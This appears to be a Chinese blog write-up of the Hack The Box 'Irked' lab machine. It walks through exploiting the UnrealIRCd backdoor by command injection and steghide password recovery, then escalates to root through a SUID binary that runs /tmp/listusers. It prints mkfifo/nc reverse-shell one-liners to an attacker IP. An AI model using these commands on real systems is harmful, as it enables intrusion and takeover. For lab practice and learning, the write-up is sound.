【Hack The Box】linux练习-- Irked

最新推荐文章于 2024-11-08 14:34:47 发布
最新推荐文章于 2024-11-08 14:34:47 发布
阅读量329 收藏
点赞数
分类专栏: Hack The Box 文章标签: linux debian 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_65527369/article/details/127925108
版权

HTB 学习笔记

【Hack The Box】linux练习-- Irked

🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

文章目录

在这里插入图片描述

信息收集

22/tcp    open     ssh           OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a5df5bdcf8378b675319bdc79c5fdad (DSA)
|   2048 752e66bfb93cccf77e848a8bf0810233 (RSA)
|   256 c8a3a25e349ac49b9053f750bfea253b (ECDSA)
|_  256 8d1b43c7d01a4c05cf82edc10163a20c (ED25519)
80/tcp    open     http          Apache httpd 2.4.10 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open     rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33304/tcp6  status
|   100024  1          41603/udp6  status
|   100024  1          42358/tcp   status
|_  100024  1          60786/udp   status
3172/tcp  filtered serverview-rm
6463/tcp  filtered unknown
6697/tcp  open     irc           UnrealIRCd
8067/tcp  open     irc           UnrealIRCd

在这里插入图片描述

这个页面让我觉得irc有问题,并且nmap给我们展示了irc名字UnrealIRCd

我在检查irc的同时开始对web页面进行目录爆破

在这里插入图片描述
结果是没有结果
如果你没有安装irc客户端可以如下这么安装

irc

apt update && apt install -y hexchat

而后hexchat打开
再首页面添加irked,而后再编辑它
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
发现并没有频道

我将搜索exp,发现如果我是3.2.8.1或者3.x我应该进行一些利用
在这里插入图片描述
但是我现在没有任何办法去获得版本信息
我将分析一下这几个基于linux的exp,看看他们是如何利用的
在这里插入图片描述看到payload
尝试一下

nc 10.129.16.135 6697
AB; ping -c 1 10.10.14.7
本机监听icmp流量
tcpdump -ni tun0 icmp

在这里插入图片描述发现成功
于是反弹端口

AB; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.7 443 >/tmp/f

在这里插入图片描述
我发现我看不到user.txt他是加密的
于是我ls -la,发现了一个.backup

Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

steg隐写术分析

在这里插入图片描述steg用下面的这个工具
带着密码我们就可以提取图片内容

steghide extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss

extract- 我想提取数据
-sf irked.jpg- 提供要从中提取的文件
-p- 密码

在这里插入图片描述
得到了密码就登陆

ssh djmardov@10.129.16.135

在这里插入图片描述查询可提权文件

find / -perm -4000 -type f 2>/dev/null

发现了一个从没见过的
在这里插入图片描述我们直接执行看看他是干嘛的
在这里插入图片描述

提权思路

说tmp下有个文件没找到,这应该就很明了了,因为他需要tmp下的文件执行,而我们对tmp完全可控,所以我们把命令写到/tmp/listusers即可
/tmp/listusers: not found

echo “test” > /tmp/listusers
再执行viewuse发现listusers没有权限
所以我们给他权限,因为他在tmp

chmod +x  /tmp/listusers

echo “id” > /tmp/listusers
再执行
viewuse

在这里插入图片描述

echo "cat /root/root.txt" > /tmp/listusers

在这里插入图片描述
我们获得了root.txt

反弹个端口就行

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.7 8888 >/tmp/f" > /tmp/listusers

viewuser
在这里插入图片描述

人间体佐菲
关注
专栏目录
Hack The Box - Irked Writeup
qq_23026851的博客
04-28 872
nmap 扫描全端口,其中有价值的为22,80,8080,65534。 通过8080端口,可以找到djmardov/下有一个.backup文件,内容为 下载80端口网页上的图片,用steghide获取隐写的文字,密码即是上图里的那一串。隐写的文字即为用户djmardov的密码。 另一种方法是用metasploit中的unreal_irc_backdoor模块,攻击65534端口,可得到一个权...
hackthebox-irked(考点:irc安全/linux修改脚本)不用msf
冬萍子癸水
04-13 306
nmap 进入80网页,看到大笑脸,和提示irc正在运行。irc是一个聊天程序。也对应了nmap扫的端口。 安装hexchat apt update && apt install -y hexchat 点进去后在network那里新建和设置连接服务器10.10.10.117:8067,登录 就可以看到版本信息了3.2.8.1 搜这个版本的漏洞看到13853.pl也许可以使用。...
HackTheBox::Irked
aya3t的博客
10-12 435
HackTheBox::Irked
Hack the box靶机 Irked
菜浪马废的博客
05-22 263
nmap扫描完我就觉得突破口在irc 但是没有任何信息啊 再找找
Linux/Irked
ve9etable的博客
03-03 699
www
英语文摘笔记1
zbhcyy的博客
04-13 160
to discard common sense and long-established theory.爱因斯坦敢于抛弃常识和长期公认的理论。to acknowledge what is obvious.吉登斯不过是敢于把这么明白的东西宣之于口而已。fighting bravely.兽人们相信对不义之才的贪恋只会妨碍他们勇敢地战斗。Gary for the prize.约翰要和盖瑞角力夺奖。Marshall.而正是“曝光”这个角度激怒了马歇尔。.厚颜无耻地宣称拥有上帝和美德的秘密.(纽约时报)
vulnhub靶机-Raven: 2
臭nana的博客
11-15 3781
1、找到靶机ip:192.168.134.130 nmap -sn 192.168.134.0/24 2、扫描靶机端口,开放22、80、111和33222端口 ┌──(root????cracer)-[~] └─# nmap -p- -A 192.168.134.130 Starting Nmap 7.91 ( https://nmap.org ) Nmap scan report for raven.local (192.168.134.130) Host is up (0.00055s l
Raven2靶机练习
SYJ_361的博客
03-27 2330
本文是对Raven2靶机的练习,通过phpmailer**CVE-2016-10033远程代码执行漏洞利用**进行反弹shell,通过控制mysql,对靶机权限进行提权,最后得到靶机里面的flag文件
靶机渗透_hackthebox__Writeup -6
qq_34717555的博客
11-11 1225
host:10.10.10.138 nmap 扫描一下 这次也尝试了一下自己的选项和A 选项发现A 比自己设置的要好很多不过这样被发现的几率也大了一些 自己配置的可以有很多降低被发现的选项 # Nmap 7.70 scan initiated Tue Aug 6 20:47:35 2019 as: nmap -A -o nmap.scan 10. 10.10.138 Nmap scan ...
Hack Toppo: 1:walkthrough【VulnHub靶场】渗透测试实战系列5
重新启程
12-09 686
靶场地址:Toppo: 1 难度:初级 先发现ip,扫描端口 root@kali:~# nmap -T5 -A -v 192.168.211.131 -p1-65535 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 19:24 CST NSE: Loaded 151 scripts for scanning. NSE: Scri...
linux openssh密码错误,Ubuntu Linux中ssh错误
weixin_31951365的博客
04-30 355
服务器启动时:couldnotloadhostkey/etc/ssh/ssh_host_rsa_key客户端连接时,总提示‘Readfromsocketfailed:Connectionresetbypeer’:xiaogw@R715:/tftpboot/xiaogw$ssh-vvv192.168.1.2OpenSSH_5.3p1Debian-3ubuntu7,O...
Metasploitable2 漏洞评估(应该没人比我写得更详细更全了)
gh0stf1re的博客
09-17 6421
Metasploitable2 漏洞评估 深感自己基础不扎实,所以打算好好再练一下,就再日一遍Metasploitable2吧 前情提要 靶机(Metasploitable2)ip:192.168.206.216 攻击机(kali)ip:192.168.206.128 端口扫描 root@kali:~/Desktop/tools# nmap -sV -p 1-65535 192.168.206.216 扫描结果如下 PORT STATE SERVICE VERSION 21/tcp
hackthebox如何获取邀请码以及配置
Oavinci的博客
02-13 8000
Hack The Box是一个在线平台,注册需要有邀请码 https://www.hackthebox.eu/invite 在console输入 makeInviteCode()得到一串base64 解码得路径: In order to generate the invite code, make a POST request to /api/invite/generate ...
Linux下的systemd/service
zxz_Fine的博客
11-05 539
开机自启任务
linux rocky 9.4部署和管理docker harbor私有源
xikui1551的博客
11-08 481
rocky 部署Harbor私有镜像仓库
linux长时间运行任务中断报警trap
最新发布
djl的专栏,blog.djl.cx好记
11-08 66
每天要运行的定时任务, 时间很长, 有一天突然被中断了, 如果能有个中断提醒就好了。sleep 命令模拟一个长时间运行的任务,并在后台运行它。wait 命令等待任务完成或被杀死,并检查。wait 命令的退出状态码来判断脚本是否被。在这个脚本中,我们使用。
Linux/Unix echo命令
Oo_Amy_oO的博客
11-04 1059
echo是 Linux 和 Unix 系统中一个非常基本且常用的命令行工具,用于在终端或文件中显示文本。以下是一些echo在终端显示 “Hello, World!echo $PATH显示环境变量PATH的值。将 “New content” 写入file.txt,如果文件不存在则创建它。将 “Additional content” 追加到file.txt文件的末尾。使用-e选项来解释转义序列(如\n表示换行)。使用-n选项来防止echo命令在输出后添加换行符。echo $?显示上一个命令的退出状态。$(
linux-find和zgrep
luxideyao的专栏
11-07 249
命令本身并不支持递归搜索,它只能搜索单个压缩文件。但是,你可以结合使用。如果你想要搜索所有类型的压缩文件,你可以使用。是你想要搜索的目录的路径。是你想要搜索的文本模式,文件,你可能需要使用。文件并搜索其中的内容。作为输入文件的占位符。
Linux:网络协议socket
Au_ust的博客
11-05 1103
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
Linux kernel 源码下载与源码在线阅读地址及其相关资源网站
代码背包客的博客
11-06 380
Linux内核源码的下载地址和在线阅读方式有多种,下面是一些与之相关的网址。同时也包含一些与kernel相关的一些资源网站,供大家参考学习!
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

人间体佐菲

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值